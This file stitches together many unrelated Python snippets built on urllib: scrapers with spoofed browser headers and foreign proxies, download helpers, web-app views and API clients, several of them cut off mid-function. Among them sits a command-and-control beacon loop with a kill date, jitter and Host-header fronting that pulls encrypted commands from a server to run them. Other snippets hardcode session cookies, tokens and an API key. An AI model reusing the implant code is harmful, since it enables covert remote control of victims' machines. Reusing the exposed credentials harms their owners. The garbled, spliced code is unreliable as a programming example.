from flask import Flask, render_template
from urllib import request, parse
import json
import time

base_url = 'https://api.forismatic.com/api/1.0/'
parameters = [('method', 'getQuote'), ('format', 'json'), ('lang', 'en')]
request_url = base_url + '?' + parse.urlencode(parameters)
request_format = request.Request(request_url)
request_format.add_header('User-Agent', 'quotedaily')

# create the application object
app = Flask(__name__)


# use decorators to link the function to a url
@app.route('/')
def home():
    if time.localtime().tm_hour == 15:
        new_quote()
    quote = get_quote()
    return render_template('index.html', quote=quote[0])


def new_quote():
    url = request.urlopen(request_format).read()
    data = json.loads(url)
    with open('quote.json', 'w') as f:
        json.dump(data, f)
def url_save_chunked(url, filepath, bar, refer=None, is_part=False, faker=False):
    if os.path.exists(filepath):
        if not force:
            if not is_part:
                if bar:
                    bar.done()
                print('Skipping %s: file already exists' %
                      tr(os.path.basename(filepath)))
            else:
                if bar:
                    bar.update_received(os.path.getsize(filepath))
            return
        else:
            if not is_part:
                if bar:
                    bar.done()
                print('Overwriting %s' % tr(os.path.basename(filepath)), '...')
    elif not os.path.exists(os.path.dirname(filepath)):
        os.mkdir(os.path.dirname(filepath))

    temp_filepath = filepath + '.download'
    received = 0
    if not force:
        open_mode = 'ab'
        if os.path.exists(temp_filepath):
            received += os.path.getsize(temp_filepath)
            if bar:
                bar.update_received(os.path.getsize(temp_filepath))
    else:
        open_mode = 'wb'

    if faker:
        headers = fake_headers
    else:
        headers = {}
    if received:
        headers['Range'] = 'bytes=' + str(received) + '-'
    if refer:
        headers['Referer'] = refer

    response = request.urlopen(request.Request(url, headers=headers), None)

    with open(temp_filepath, open_mode) as output:
        while True:
            buffer = response.read(1024 * 256)
            if not buffer:
                break
            output.write(buffer)
            received += len(buffer)
            if bar:
                bar.update_received(len(buffer))

    assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % (
        received, os.path.getsize(temp_filepath), temp_filepath)

    if os.access(filepath, os.W_OK):
        os.remove(filepath)  # on Windows rename could fail if destination filepath exists
    os.rename(temp_filepath, filepath)
from urllib import request, parse

values = "username:'******'123456"
data = values.encode(encoding="gb2312")
url = 'https://music.163.com/#/song?id=869785'
my_request = request.Request(url, data)
response = request.urlopen(my_request)
print(response.read())
while 1:
    JiCi += 1
    YouBiao.execute("select URL from URL_Ji1 where ID=" + str(JiCi))
    url = YouBiao.fetchone()
    if url != None:
        url = url[0]
    else:
        break
    try:
        # extract the link
        if re.search(r"DirectLink.direct", url) != None:
            pmbh = re.findall(r"sp=S?(\w+)&", url)[1]
            url2 = "http://www.hngp.gov.cn/wsscnew/egp/jy/xyghjy/xyghxm/xyghzy/xzsp/XyspList.html?pmbh=" + pmbh + "&cgsl=0&cgje=0.0&ppbh=null&lastcgsl=0&lastcgje=0.0&xmxh=null&xyghbh=null&isnwwbz=ww&area=00390019&czy=null&lbbs=null"
            url2 = quote(url2, '\/:?=;@&+$,%.#\n')
            Request2 = request.Request(url=url2, headers=header1)
            try:
                DaKai_url2 = request.urlopen(Request2)
            except:
                try:
                    DaKai_url2 = request.urlopen(Request2)
                except:
                    print("Opening link " + url + " timed out; skipping this link.")
                    RiZhiChuLi(2, url, pmbh, url2, None)
                    continue
            BeautifulSoup2 = BeautifulSoup(DaKai_url2, "html.parser",
                                           from_encoding="utf-8")
            # process the list page
            YeShu = BeautifulSoup2.find("span", style="float:right").get_text()
            YeShu = re.findall(r"共(\d+)页", YeShu)[0]
# 1. Japan
# proxy = {'http': '140.227.65.196:3128'}
# 2. Russia
proxy = {'http': '94.242.59.135:1448'}
# 2. Create a ProxyHandler
proxy_handler = request.ProxyHandler(proxy)
# 3. Create an opener
opener = request.build_opener(proxy_handler)
# 4. Install the opener
request.install_opener(opener)
# From here on, any request to the url goes through the proxy server

# Change the browser user-agent string; see: https://www.cnblogs.com/xpwi/p/9600719.html
try:
    req = request.Request(url)
    req.add_header(
        "User-Agent",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163"
    )
    rsp = request.urlopen(req)
    html = rsp.read().decode()
    print("Visit succeeded, visitor +1. The page HTML follows:\n", html,
          "\nVisit succeeded, visitor +1. That was the page HTML.\n")
except error.HTTPError as e:
    print(e)
except Exception as e:
    print(e)
###################################################
print('============= GET =============')
with request.urlopen('https://www.baidu.com') as f:
    data = f.read()
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print(' %s: %s' % (k, v))
    print('Data: ', data.decode('utf-8'))

###################################################
# Add request headers
###################################################
print('============= Add headers =============')
req = request.Request('http://www.baidu.com')
req.add_header(
    'User-Agent',
    'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25'
)
with request.urlopen(req) as f:
    data = f.read()
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print(' %s: %s' % (k, v))
    print('Data: ', data.decode('utf-8'))

###################################################
# POST
###################################################
print('============= POST =============')
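# The snippet above ends right after announcing its POST section. Below is a
# minimal, hedged sketch of what such a POST step could look like with urllib;
# the target URL (httpbin.org/post) and the form fields are assumptions for
# illustration only, not part of the original example.
from urllib import request, parse

post_data = parse.urlencode({'name': 'demo', 'lang': 'python'}).encode('utf-8')
post_req = request.Request('https://httpbin.org/post', data=post_data)  # data= makes it a POST
with request.urlopen(post_req) as f:
    print('Status:', f.status, f.reason)
    print('Data: ', f.read().decode('utf-8'))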
agent3 = "Mozilla/5.0 (Linux; U; Android 8.0.0; zh-CN; MHA-AL00 Build/HUAWEIMHA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.1.4.994 Mobile Safari/537.36"
agent4 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
agent5 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
list1 = [agent1, agent2, agent3, agent4, agent5]
agent = random.choice(list1)

# build the request headers
header = {
    "User-Agent": agent,
    "Cookie": "__guid=54589117.3355346342630053000.1545469390794.6116; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1545469392; _ga=GA1.2.525028080.1545469392; customerId=5c1dfddd1c648b470dce01bc; customerToken=7094f880-05c8-11e9-b37a-bbc022d7aefd; customerMail=; isLogin=yes; __utmz=54589117.1550903385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=54589117.525028080.1545469392.1550986423.1551265116.3; _gid=GA1.2.1073060500.1552831283; aliyungf_tc=AQAAAD/RilUP4wcAn/Q5cZh/y5cvhjrW; connect.sid=s%3AdBSjH13Adl1RlFsC2zZlAxGDmFh2kF_F.Yf52AS5i06bgo8lsniQWt1F4NtgmI3rOrmjBIiLwR6Q; SERVER_ID=5aa5eb5e-f0eda04d; Hm_lvt_5667c6d502e51ebd8bd9e9be6790fb5d=1551698067,1551698230,1552831282,1552908428; monitor_count=29; Hm_lpvt_5667c6d502e51ebd8bd9e9be6790fb5d=1552909773"
}

titlelist = []
jianjielist = []
ulist = []
for i in urllist:
    req = request.Request(i, headers=header)
    response1 = request.urlopen(req).read().decode()
    data1 = re.findall(
        r'"topicTotalNum":\d+,"title":"(.{0,50}?)","columnType":\d+,"authorId":',
        response1)
    # data2 = re.findall(r'"columnList":.*?"_id":"(.*?)"', response1)
    data3 = re.findall(
        r'"columnTopics":.*?([(0-9)(a-z)(A-Z)]{24}).*?,"status"', response1)
    print(data3)
def intormation_book(request, pagesize=24, pageno=1):
    try:
        try:
            if bool(request.GET['bool']) == True:
                pageno = int(request.GET['next_number'])
                pageno += int(request.GET['next'])
        except:
            pass
        try:
            if bool(request.GET['bool-back']) == True:
                pageno = int(request.GET['back_number'])
                pageno -= int(request.GET['back-up'])
        except:
            pass
        try:
            if pageno > int(request.GET['page_total']):
                pageno = int(request.GET['page_total'])
        except:
            pass
        informa_book_url = f'https://m.ebookservice.tw/api/3.00/ks/BookList/?pageSize=24&pageNo={pageno}&classification=TCL144&keyword='
        requests = req.Request(
            informa_book_url,
            headers={
                'cookie':
                'mid=WLsL4gAEAAGl0Wjoc8Dv6CH_iYnP; mcd=3; ds_user_id=1926542376; csrftoken=9aasLCq0vb2dUQWY9j1rjP11aejod1wS; sessionid=1926542376%3AG5zq9okSZhBxWx%3A8; ig_did=8675D711-4D34-4DBA-8751-F9E4E3B8FA63; shbid=17721; shbts=1602880097.7694821; rur=VLL; urlgen="{\"61.228.154.31\": 3462}:1kTWVn:7qfV2Cxf3rs1oZ9BUi45bNQ18T4',
                'User-Agent':
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
            })
        with req.urlopen(requests) as response:
            data = response.read().decode('utf8')
            data = json.loads(data)
            page_total = data['TotalRecordCount']
            datas = data['List']
            book_ID_dic = {}
            for date in datas:
                book_flash = {}
                book_ID = date['TinyBook']['BookId']
                book_contents = hot_book_total_url(book_ID)
                book_contents = read_hotbook_total_url(book_contents)
                book_flash.setdefault('book_img_url', hot_book_img(book_ID))  # image URL
                book_flash.setdefault('TitleCache', book_contents['TitleCache'])  # title
                book_flash.setdefault('Author', book_contents['Author'])  # author
                book_flash.setdefault('PublisherName', book_contents['PublisherName'])  # publisher
                book_flash.setdefault('TotalPage', book_contents['TotalPage'])  # total pages
                book_flash.setdefault('UpdateDate', book_contents['UpdateDate'])  # upload date
                book_flash.setdefault('Description', book_contents['Description'])  # description
                book_flash.setdefault('ISBN', book_contents['ISBN'])  # book number
                book_ID_dic.setdefault(book_ID, book_flash)
        return render(request, 'information-book.html', {
            'book_ID_dic': book_ID_dic,
            'pageno': pageno,
            'page_total': page_total
        })
    except:
        return render(request, 'information-book.html', {'date_time': "Error"})
def hot_book(request,
             date_time=time.strftime(f'%Y/%m/%d', time.localtime()),
             book_number=1):
    try:
        try:
            book_number = request.GET['book_searcg']
        except:
            pass
        if time.strptime(date_time, f"%Y/%m/%d"):
            hot_book_url = f'https://m.ebookservice.tw/api/3.00/kl;taipei;nt;ty;ml;ntc;cy;cyc;tn;ks;pt;ph;il;km;hc;hcc;ylc;ntl2;tt;tcl/TclPopularBook/?beginDate={date_time}&endDate={date_time}%2023:59:59&type=book&takeSize={book_number}'
            # hot_book_url = f'https://m.ebookservice.tw/api/3.00/kl;taipei;nt;ty;ml;ntc;cy;cyc;tn;ks;pt;ph;il;km;hc;hcc;ylc;ntl2;tt;tcl/TclPopularBook/?beginDate=2020/11/5&endDate=2020/11/5%2023:59:59&type=book&takeSize={book_number}'
            requests = req.Request(
                hot_book_url,
                headers={
                    'cookie':
                    'mid=WLsL4gAEAAGl0Wjoc8Dv6CH_iYnP; mcd=3; ds_user_id=1926542376; csrftoken=9aasLCq0vb2dUQWY9j1rjP11aejod1wS; sessionid=1926542376%3AG5zq9okSZhBxWx%3A8; ig_did=8675D711-4D34-4DBA-8751-F9E4E3B8FA63; shbid=17721; shbts=1602880097.7694821; rur=VLL; urlgen="{\"61.228.154.31\": 3462}:1kTWVn:7qfV2Cxf3rs1oZ9BUi45bNQ18T4',
                    'User-Agent':
                    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
                })
            with req.urlopen(requests) as response:
                data = response.read().decode('utf8')
                datas = json.loads(data)
                datas = datas['List']
                book_ID_dic = {}
                # book_url_list = []
                for date in datas:
                    book_flash = {}
                    book_ID = date['TinyBook']['BookId']
                    book_contents = hot_book_total_url(book_ID)
                    book_contents = read_hotbook_total_url(book_contents)
                    book_flash.setdefault('book_img_url', hot_book_img(book_ID))  # image URL
                    book_flash.setdefault('TitleCache', book_contents['TitleCache'])  # title
                    book_flash.setdefault('Author', book_contents['Author'])  # author
                    book_flash.setdefault('PublisherName', book_contents['PublisherName'])  # publisher
                    book_flash.setdefault('TotalPage', book_contents['TotalPage'])  # total pages
                    book_flash.setdefault('UpdateDate', book_contents['UpdateDate'])  # upload date
                    book_flash.setdefault('Description', book_contents['Description'])  # description
                    book_flash.setdefault('ISBN', book_contents['ISBN'])  # book number
                    book_ID_dic.setdefault(
                        book_ID, book_flash
                    )  # {ID: [img_url, TitleCache (title), Author (author), PublisherName (publisher), TotalPage (total pages), UpdateDate (upload date), Description (description), ISBN (book number)]}
                    # book_url_list.append(hot_book_img(book_ID))  'book_url_list': book_url_list  # GET image URL
        return render(
            request, 'hot-book.html', {
                'date_time': date_time,
                'book_number': book_number,
                'book_ID_dic': book_ID_dic
            })
    except:
        return render(request, 'hot-book.html', {'date_time': "Error"})
    headers = {
        "accept-encoding": "gzip, deflate",  # br encoding dropped: requests and scrapy cannot decode it
        "accept-language": "zh-CN,zh;q=0.9",
        "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
    }
    return url, headers


method = 'GET'
url, headers = mk_url_headers()
body = None
r = request.Request(url, method=method)
for k, v in headers.items():
    if k.lower() == 'accept-encoding':
        continue  # urllib does not decompress responses automatically, so skip this header field
    r.add_header(k, v)
s = request.urlopen(r)
print(url)
content = s.read()

parser = Vparser()
print('start')
v = VHTML(content.decode())
for i in v.xpath('//a/@href'):
    print(i)
print('---- split ----')
for i in v.xpath('//div/div/span[1][@class="wetSource"]/text()'):
def loadpage(fullurl, filename):
    print("Downloading:", filename)
    req = request.Request(fullurl, headers=header)
    resp = request.urlopen(req).read()
    return resp
def fetch(self, url, method='GET', headers=None, body=None):
    """Perform a HTTP request and return decoded JSON data"""
    headers = headers or {}
    if self.userAgent:
        if type(self.userAgent) is str:
            headers.update({'User-Agent': self.userAgent})
        elif (type(self.userAgent) is dict) and ('User-Agent' in self.userAgent):
            headers.update(self.userAgent)
    if len(self.proxy):
        headers.update({'Origin': '*'})
    headers.update({'Accept-Encoding': 'gzip, deflate'})
    url = self.proxy + url
    if self.verbose:
        print(url, method, url, "\nRequest:", headers, body)
    if body:
        body = body.encode()

    request = _urllib.Request(url, body, headers)
    request.get_method = lambda: method
    response = None
    text = None
    try:  # send request and load response
        handler = _urllib.HTTPHandler if url.startswith('http://') else _urllib.HTTPSHandler
        opener = _urllib.build_opener(handler)
        response = opener.open(request, timeout=int(self.timeout / 1000))
        text = response.read()
    except socket.timeout as e:
        raise RequestTimeout(' '.join([self.id, method, url, 'request timeout']))
    except ssl.SSLError as e:
        self.raise_error(ExchangeNotAvailable, url, method, e)
    except _urllib.HTTPError as e:
        error = None
        details = text if text else None
        if e.code == 429:
            error = DDoSProtection
        elif e.code in [404, 409, 500, 501, 502, 521, 522, 525]:
            details = e.read().decode('utf-8', 'ignore') if e else None
            error = ExchangeNotAvailable
        elif e.code in [400, 403, 405, 503]:
            # special case to detect ddos protection
            reason = e.read().decode('utf-8', 'ignore')
            ddos_protection = re.search('(cloudflare|incapsula)', reason,
                                        flags=re.IGNORECASE)
            if ddos_protection:
                error = DDoSProtection
            else:
                error = ExchangeNotAvailable
                details = '(possible reasons: ' + ', '.join([
                    'invalid API keys',
                    'bad or old nonce',
                    'exchange is down or offline',
                    'on maintenance',
                    'DDoS protection',
                    'rate-limiting',
                    reason,
                ]) + ')'
        elif e.code in [408, 504]:
            error = RequestTimeout
        elif e.code in [401, 422, 511]:
            error = AuthenticationError
        self.raise_error(error, url, method, e, details)
    except _urllib.URLError as e:
        self.raise_error(ExchangeNotAvailable, url, method, e)

    encoding = response.info().get('Content-Encoding')
    if encoding in ('gzip', 'x-gzip', 'deflate'):
        if encoding == 'deflate':
            text = zlib.decompress(text, -zlib.MAX_WBITS)
        else:
            data = gzip.GzipFile('', 'rb', 9, io.BytesIO(text))
            text = data.read()
    body = text.decode('utf-8')
    if self.verbose:
        print(method, url, "\nResponse:", headers, body)
    return self.handle_response(url, method, headers, body)
def __execute(self, http_method, url, basic_auth, query_params, post_params):
    passwords = []

    if len(url) == 0:
        raise SystemError('url required')
    if len(query_params) > 0:
        url += '?' + parse.urlencode(query_params)
    if post_params == None:
        request_body = ''
    else:
        request_body = json.dumps(post_params)
    request_body = request_body.encode(self.char_code)

    http_header = {
        'Content-Type': self.CONTENT_TYPE,
        'Content-Length': str(len(request_body))
    }
    if len(basic_auth) > 0:
        passwords.append(basic_auth['pass'])
        authorization = basic_auth['id'] + ':' + basic_auth['pass']
        http_header['Authorization'] = 'Basic ' + base64.b64encode(
            authorization.encode(self.char_code)).decode('ascii')

    # Output Log (MSA Request)
    log_msg = '[MSA Request]'
    log_msg += '[METHOD]' + http_method
    log_msg += '[URL]' + url
    log_msg += '[HEADER]' + json.dumps(http_header)
    log_msg += '[PARAMS]' + json.dumps(post_params)
    self.logger.log_info(__name__, log_msg, passwords)

    req = request.Request(url, headers=http_header, data=request_body)
    req.method = http_method
    with request.urlopen(req) as res:
        response_params = res.read().decode(self.char_code)

        # Output Log (MSA Response)
        log_msg = '[MSA Response]'
        log_msg += '[STATUS]' + str(res.getcode())
        log_msg += '[HEADER]' + str(res.headers)
        log_msg += '[PARAMS]' + response_params
        self.logger.log_info(__name__, log_msg, passwords)

    if len(response_params) > 0:
        try:
            response_params = json.loads(response_params)
        except json.decoder.JSONDecodeError:
            raise SystemError(response_params)
        except:
            raise
    return response_params
def saveResult(self, run, task):
    taskKey = task['key']
    log_file = run['logFile']
    headers = {'Accept': 'text/plain'}

    fileNames = []
    for file in task['files']:
        fileNames.append(file['name'])

    try:
        util.write_file(json.dumps(task), log_file + '.stdOut')
    except:
        logging.debug('Could not save task ' + taskKey)

    statisticsProcessed = False
    if APPENGINE_SETTINGS['statisticsFileName'] in fileNames:
        try:
            uri = self.benchmark.config.appengineURI + '/tasks/' + taskKey + '/files/' + APPENGINE_SETTINGS['statisticsFileName']
            request = urllib2.Request(uri, headers=headers)
            response = urllib2.urlopen(request).read().decode()
            util.write_file(response, log_file)
            statisticsProcessed = True
        except:
            statisticsProcessed = False
            logging.exception('Could not save statistics of ' + taskKey)
    else:
        statisticsProcessed = True

    if APPENGINE_SETTINGS['errorFileName'] in fileNames:
        try:
            uri = self.benchmark.config.appengineURI + '/tasks/' + taskKey + '/files/' + APPENGINE_SETTINGS['errorFileName']
            request = urllib2.Request(uri, headers=headers)
            response = urllib2.urlopen(request).read().decode()
            response = 'Task Key: {}\n{}'.format(task['key'], response)
            util.write_file(response, log_file + '.stdErr')
        except:
            logging.exception('Error while retrieving result file for ' + taskKey)

    headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
    markedAsProcessed = False
    if statisticsProcessed:
        try:
            uri = self.benchmark.config.appengineURI + '/tasksets/' + self.tasksetKey + '/tasks'
            request = urllib2.Request(uri, json.dumps([taskKey]).encode(), headers=headers)
            request.get_method = lambda: 'PUT'
            urllib2.urlopen(request)
            self.finishedTasks += 1
            markedAsProcessed = True
            logging.info('Stored result of task {0} in file {1}'.format(taskKey, log_file))
            try:
                with open(self.benchmark.output_base_name + '.Processed_Tasks.txt', 'a') as f:
                    f.write(taskKey + '\n')
            except:
                pass
            logging.debug('Task {} finished. Status: {}'.format(taskKey, task['status']))
        except:
            logging.debug('The task {} could not be marked as processed.'.format(taskKey))

    if self.benchmark.config.appengineDeleteWhenDone and markedAsProcessed:
        try:
            uri = self.benchmark.config.appengineURI + '/tasks/' + taskKey
            request = urllib2.Request(uri, headers=headers)
            request.get_method = lambda: 'DELETE'
            urllib2.urlopen(request).read()
        except:
            logging.exception('The task {} could not be deleted.'.format(taskKey))
    infile = StringIO.StringIO(data[16:])
    with gzip.GzipFile(fileobj=infile, mode="r") as f:
        data = f.read()
    return data


while (True):
    cstr = time.strftime("%%Y-%%m-%%d", time.gmtime())
    cstr = time.strptime(cstr, "%%Y-%%m-%%d")
    if cstr < kd:
        key = "%s"
        uri = "%s"
        server = "%%s/%%s%%s" %% (serverclean[0], random.choice(urls), uri)
        try:
            this_timer = random.randint(timer * (1 - jitter), timer * (1 + jitter))
            time.sleep(this_timer)
            ua = '%s'
            if hh[0]:
                req = urllib2.Request(server, headers={'Host': hh[0], 'User-agent': ua})
            else:
                req = urllib2.Request(server, headers={'User-agent': ua})
            res = urllib2.urlopen(req)
            html = res.read().decode("utf-8")
        except Exception as e:
            print("error %%s" %% e)
        if html:
            try:
                returncmd = decrypt(key, html)
                returncmd = returncmd.rstrip('\\0')
                returncmd = base64.b64decode(returncmd).decode("utf-8")
                if "multicmd" in returncmd:
                    returncmd = returncmd.replace("multicmd", "")
                    returnval = ""
                    splits = returncmd.split("!d-3dion@LD!-d")
from urllib import request, parse

req = request.Request('http://www.baidu.com')
# add a User-Agent header to mimic a normal browser visit
req.add_header(
    'User-Agent',
    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.9.3.1000 Chrome/39.0.2146.0 Safari/537.36')
resp = request.urlopen(req)
print(resp)
print(help(request.urlopen))
print('________________________________________________________________________________')
""" turns an int into a human reable byte size without the need of an external module found there : http://code.activestate.com/recipes/577081-humanized-representation-of-a-number-of-bytes/ """ suffixes = ['B', 'KB', 'MB', 'GB', 'TB'] suffixIndex = 0 while size > 1024: suffixIndex += 1 #increment the index of the suffix size = size / 1024.0 #apply the division return '{0:.{1}f} {2}'.format(size, precision, suffixes[suffixIndex]) print('Connecting to ebi public FTP server...') ## get ml_file_extensions via http study_url = 'http://ftp.ebi.ac.uk/pub/databases/metabolights/study_file_extensions/ml_file_extension.json' req = rq.Request(study_url) con = rq.urlopen(req) ## get studies containing mzML e = json.JSONDecoder() study = e.decode(con.read().decode('utf-8')) mzml_studies = [k['id'] for k in study if '.mzML' in k['extensions']] ## create output folder if not os.path.isdir('example_files/metabolights'): os.mkdir('example_files/metabolights') os.chdir('example_files/metabolights') ## start ftp session ftp = ftplib.FTP('ftp.ebi.ac.uk') ftp.login()
from urllib import request

req = request.Request('http://www.douban.com')
req.add_header(
    'User-Agent',
    'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('%s: %s' % (k, v))
    print('Data:', f.read().decode('utf-8'))
import urllib.request as req
import matplotlib.pyplot as plt


def inputstock(url):
    url = "https://histock.tw/stock/financial.aspx?no=" + url + "&t=2"
    url = "https://histock.tw/stock/financial.aspx?no=2887&t=2"  # hard-coded stock id; overrides the parameter above
    # attach headers to pose as a regular browser user
    request = req.Request(
        url,
        headers={
            "user-agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
        })
    with req.urlopen(request) as response:
        data = response.read().decode("utf-8")
    # print(data)

    # parse the page source
    import bs4
    root = bs4.BeautifulSoup(data, "html.parser")
    EPS_5Y = []


def inputstock(url):
    url = "https://histock.tw/stock/financial.aspx?no=" + url + "&t=2"
# mesaj_gonder: send a message (isim = name, mesaj = message) as a JSON POST
def mesaj_gonder(isim, mesaj):
    data = json.dumps({"message": mesaj, "sender": isim}).encode()
    rq = request.Request(url, data, headers={'content-type': 'application/json'})
    response = request.urlopen(rq)
    return json.loads(response.read().decode())
#!/usr/bin/env python
# coding:utf-8
from urllib import request

with request.urlopen('http://news-at.zhihu.com/api/4/news/latest') as f:  # Zhihu Daily newest feed API
    data = f.read()
    print('Status:', f.status, f.reason)
    print()
    for k, v in f.getheaders():
        print('{0}: {1}'.format(k, v))
    print("################################################################")
    print('Data:', data.decode('utf-8'))
    print("################################################################")

req = request.Request('http://daily.zhihu.com/')  # Zhihu Daily frontpage
req.add_header(
    'User-Agent',
    'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25'
)  # add header; request the iPhone version of the page
with request.urlopen(req) as f:
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('{0}: {1}'.format(k, v))
    print("################################################################")
    print('Data:', f.read().decode('utf-8'))
def GetScenes():
    req = urllib2.Request('http://localhost:8080/json.htm?type=scenes')
    resp = urllib2.urlopen(req)
    data = resp.read()
    data = json.loads(data)
    return data
from urllib import request

url = "http://www.baidu.com"
# add header info to work around anti-scraping measures
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
}
req = request.Request(url, headers=header)
res = request.urlopen(req)
html = res.read()
html = str(html, encoding='utf-8')
print(html)
def index(request, lang="EN"): #template = loader.get_template('cv_parser/index.html') language = "Français" language_code = "fr" languages = {'language': 'English', 'code': 'us', 'link': 'EN'} if lang == "FR": with open("cv_parser/fr.json", 'r') as config: json_config = json.loads(config.read()) config.close() elif lang == "EN": language = "English" languages = {'language': 'Français', 'code': 'fr', 'link': 'FR'} language_code = "us" with open("cv_parser/en.json", 'r') as config: json_config = json.loads(config.read()) config.close() else: with open("cv_parser/fr.json", 'r') as config: json_config = json.loads(config.read()) config.close() #with open("cv_parser/cache.json","r") as cache_file: # json_cache=json.loads(cache_file.read()) # cache_file.close() #hash_of_adress = json_config["contact"]["adress"].encode("utf-8") #hash_of_adress = hashlib.md5(hash_of_adress).hexdigest() #if json_cache["adress"] != hash_of_adress: try: cmap = CenterMap(address=json_config["contact"]["adress"], zoom=15, key="AIzaSyCKM9tkv_Rc9fMhuwLhwNwvW8C9Y6hNuNg=") requ = req.Request(cmap.generate_url()) pic = req.urlopen(requ) filePath = 'cv_parser/static/cv_parser/images/static_map.png' with open(filePath, 'wb') as localFile: localFile.write(pic.read()) #json_cache["adress"] = hash_of_adress #with open("cv_parser/cache.json","w") as cache_file: # json.dump(json_cache, cache_file) # cache_file.close() except: print( "Error getting map image , put it manually in cv_parser/static/cv_parser/images/static_map.png" ) #hash_of_config = json.dumps(json_config, sort_keys = True).encode("utf-8") #hash_of_config = hashlib.md5(hash_of_config).hexdigest() #logger.info(json_cache[lang.lower()+"_pdf_hash"]) #logger.info(hash_of_config) #if json_cache[lang.lower()+"_pdf_hash"] != hash_of_config: template.create_template(json_config) #logger.info("new json") #json_cache[lang.lower()+"_pdf_hash"] = hash_of_config #with open("cv_parser/cache.json","w") as cache_file: # json.dump(json_cache, cache_file) # cache_file.close() # urllib.urlretrieve(self.url, filePath) return render( request, 'cv_parser/index.html', { 'config': json_config, 'language': language, 'language_code': language_code, 'languages': languages })
def url_save(url, filepath, bar, refer=None, is_part=False, faker=False):
    file_size = url_size(url, faker=faker)

    if os.path.exists(filepath):
        if not force and file_size == os.path.getsize(filepath):
            if not is_part:
                if bar:
                    bar.done()
                print('Skipping %s: file already exists' %
                      tr(os.path.basename(filepath)))
            else:
                if bar:
                    bar.update_received(file_size)
            return
        else:
            if not is_part:
                if bar:
                    bar.done()
                print('Overwriting %s' % tr(os.path.basename(filepath)), '...')
    elif not os.path.exists(os.path.dirname(filepath)):
        os.mkdir(os.path.dirname(filepath))

    temp_filepath = filepath + '.download'
    received = 0
    if not force:
        open_mode = 'ab'
        if os.path.exists(temp_filepath):
            received += os.path.getsize(temp_filepath)
            if bar:
                bar.update_received(os.path.getsize(temp_filepath))
    else:
        open_mode = 'wb'

    if received < file_size:
        if faker:
            headers = fake_headers
        else:
            headers = {}
        if received:
            headers['Range'] = 'bytes=' + str(received) + '-'
        if refer:
            headers['Referer'] = refer

        response = request.urlopen(request.Request(url, headers=headers), None)
        try:
            range_start = int(response.headers['content-range'][6:].split('/')
                              [0].split('-')[0])
            end_length = end = int(
                response.headers['content-range'][6:].split('/')[1])
            range_length = end_length - range_start
        except:
            range_length = int(response.headers['content-length'])

        if file_size != received + range_length:
            received = 0
            if bar:
                bar.received = 0
            open_mode = 'wb'

        with open(temp_filepath, open_mode) as output:
            while True:
                buffer = response.read(1024 * 256)
                if not buffer:
                    if received == file_size:  # Download finished
                        break
                    else:  # Unexpected termination. Retry request
                        headers['Range'] = 'bytes=' + str(received) + '-'
                        response = request.urlopen(
                            request.Request(url, headers=headers), None)
                output.write(buffer)
                received += len(buffer)
                if bar:
                    bar.update_received(len(buffer))

    assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % (
        received, os.path.getsize(temp_filepath), temp_filepath)

    if os.access(filepath, os.W_OK):
        os.remove(filepath)  # on Windows rename could fail if destination filepath exists
    os.rename(temp_filepath, filepath)
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'
}
url = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'

# parameters submitted with the POST request
formdata = {
    'i': key,
    'from': 'AUTO',
    'to': 'AUTO',
    'smartresult': 'dict',
    'client': 'fanyideskweb',
    'salt': '15814112793734',
    'sign': 'b54a57150836a4b5aede88441e12a9c1',
    'ts': '1581411279373',
    'bv': '37074a7035f34bfbf10d32bb8587564a',
    'doctype': 'json',
    'version': '2.1',
    'keyfrom': 'fanyi.web',
    'action': 'FY_BY_REALTlME'
}
# urlencode the form data and encode it to bytes
data = urllib.parse.urlencode(formdata).encode(encoding='utf-8')
# a request with a data argument is sent as POST; without it, as GET
req = request.Request(url, data=data, headers=header)
response = request.urlopen(req).read().decode()
# extract anything between "tgt":" and "}]]
pat = r'"tgt":"(.*?)"}]]'
